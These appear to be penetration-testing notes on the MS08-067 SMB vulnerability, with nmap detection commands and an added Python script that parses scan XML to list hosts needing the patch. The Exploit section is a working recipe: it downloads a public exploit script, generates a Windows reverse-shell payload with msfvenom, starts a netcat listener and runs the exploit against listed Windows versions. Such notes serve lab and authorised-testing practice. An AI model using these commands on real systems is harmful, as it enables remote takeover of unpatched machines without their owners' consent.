Detection
IP=x.x.x.x
nmap -Pn -sV -p 445 --script=smb-vuln* -d $IP
nmap -Pn -sV -p 445 --script=smb-vuln* --script-args=smbdomain=example,smbusername=user1,smbpassword=mypass -d $IP
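Added example (not from the original notes): the two nmap runs above can be saved with -oX and triaged offline. This script parses such an XML report and lists every host whose smb-vuln* script reported a VULNERABLE state, so the result can feed patch tracking rather than being read by eye. The embedded XML is a constructed sample, and it assumes the vulns-library layout in which each port script appears as a <script> element under <port> with one <table> per finding carrying an <elem key="state">.

```python
import xml.etree.ElementTree as ET

# Constructed sample of `nmap -oX` output with two hosts. Layout is an
# assumption about the vulns library format, not captured scan data.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
        <script id="smb-vuln-ms08-067" output="VULNERABLE">
          <table key="MS08-067">
            <elem key="title">Microsoft Windows system vulnerable to remote code execution (MS08-067)</elem>
            <elem key="state">VULNERABLE</elem>
          </table>
        </script>
      </port>
    </ports>
  </host>
  <host>
    <address addr="10.0.0.9" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="445">
        <state state="open"/>
        <service name="microsoft-ds"/>
        <script id="smb-vuln-ms08-067" output="NOT VULNERABLE">
          <table key="MS08-067">
            <elem key="state">NOT VULNERABLE</elem>
          </table>
        </script>
      </port>
    </ports>
  </host>
</nmaprun>
"""


def parse_smb_vuln_findings(xml_text):
    """Return a list of (ip, port, script_id, state) tuples, one per finding
    table produced by any smb-vuln* script in the report."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr_el = host.find("address[@addrtype='ipv4']")
        ip = addr_el.get("addr") if addr_el is not None else "?"
        for port in host.iter("port"):
            portid = port.get("portid", "?")
            for script in port.findall("script"):
                sid = script.get("id", "")
                if not sid.startswith("smb-vuln"):
                    continue
                tables = script.findall("table")
                if not tables:
                    # No structured table: fall back to the raw output text.
                    findings.append((ip, portid, sid, script.get("output", "").strip()))
                    continue
                for table in tables:
                    state_el = table.find("elem[@key='state']")
                    state = state_el.text.strip() if state_el is not None and state_el.text else "UNKNOWN"
                    findings.append((ip, portid, sid, state))
    return findings


def is_vulnerable_state(state):
    """True for VULNERABLE / LIKELY VULNERABLE style states, False for NOT VULNERABLE."""
    s = state.upper()
    return "VULNERABLE" in s and not s.startswith("NOT")


def vulnerable_hosts(findings):
    """Sorted, de-duplicated IPs with at least one vulnerable finding."""
    return sorted({ip for ip, _, _, state in findings if is_vulnerable_state(state)})


if __name__ == "__main__":
    results = parse_smb_vuln_findings(SAMPLE_XML)
    for ip, port, sid, state in results:
        print(f"{ip}:{port} {sid} -> {state}")
    print("Needs MS08-067 patch:", ", ".join(vulnerable_hosts(results)))
```

To use it on a real report, run the nmap command above with -oX smb.xml and pass the file contents to parse_smb_vuln_findings; hosts returned by vulnerable_hosts are the ones still missing the MS08-067 update.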
Exploit
Download the exploit
wget https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py
Generate the payload
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=443 EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f py -v shellcode -a x86 --platform windows
Replace the shellcode in the exploit with the msfvenom output
shellcode = (
...
)
Start a listener
sudo nc -nlvp 443
Run the exploit
chmod u+x ms08-067.py
Windows XP SP0/SP1 Universal, port 445
./ms08-067.py $IP 1 445
Windows 2000 Universal, port 139 (445 could also be used)
./ms08-067.py $IP 2 139
./ms08-067.py $IP 2 445
Windows 2003 SP0 Universal
./ms08-067.py $IP 3 445
Windows 2003 SP1 English
./ms08-067.py $IP 4 445
Windows XP SP3 French (NX)
./ms08-067.py $IP 5 445
Windows XP SP3 English (NX)
./ms08-067.py $IP 6 445
Windows XP SP3 English (AlwaysOn NX)
./ms08-067.py $IP 7 445